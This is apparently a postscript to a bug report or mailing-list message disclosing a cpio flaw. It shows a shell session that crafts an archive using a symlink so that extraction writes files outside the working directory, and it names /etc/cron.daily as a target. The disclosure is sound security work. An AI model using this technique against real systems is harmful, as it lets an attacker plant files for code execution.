P.P.S. I found a more subtle security hole. It is even more dangerous. /tmp/aaa$ mkdir ../b /tmp/aaa$ ln -s ../b b /tmp/aaa$ touch ../b/trojan /tmp/aaa$ ls b trojan /tmp/aaa$ find b b/trojan b b/trojan /tmp/aaa$ find b b/trojan | cpio -o > dangerous cpio: b: truncating inode number cpio: b/trojan: truncating inode number 1 block /tmp/aaa$ /bin/rm -v b/trojan b removed `b/trojan' removed `b' /tmp/aaa$ ls dangerous /tmp/aaa$ cpio -t<dangerous b b/trojan 1 block /tmp/aaa$ cpio -vt<dangerous lrwxrwxrwx 1 kpc kpc 4 Apr 27 19:46 b -> ../b -rw------- 1 kpc kpc 0 Apr 27 19:46 b/trojan 1 block
Notice that grep '\.\.' on the output of cpio -t would not find the relative pathname. You have to use cpio -vt. Now watch this: /tmp/aaa$ cpio -i<dangerous 1 block /tmp/aaa$ ls b dangerous /tmp/aaa$ ls ../b trojan IMHO cpio should disallow this by default. Imagine ../../../../../../../etc/cron.daily again. cpio should check for extracting in directories that are not below pwd, even if it is via indirect means such as a symlink. Wow!
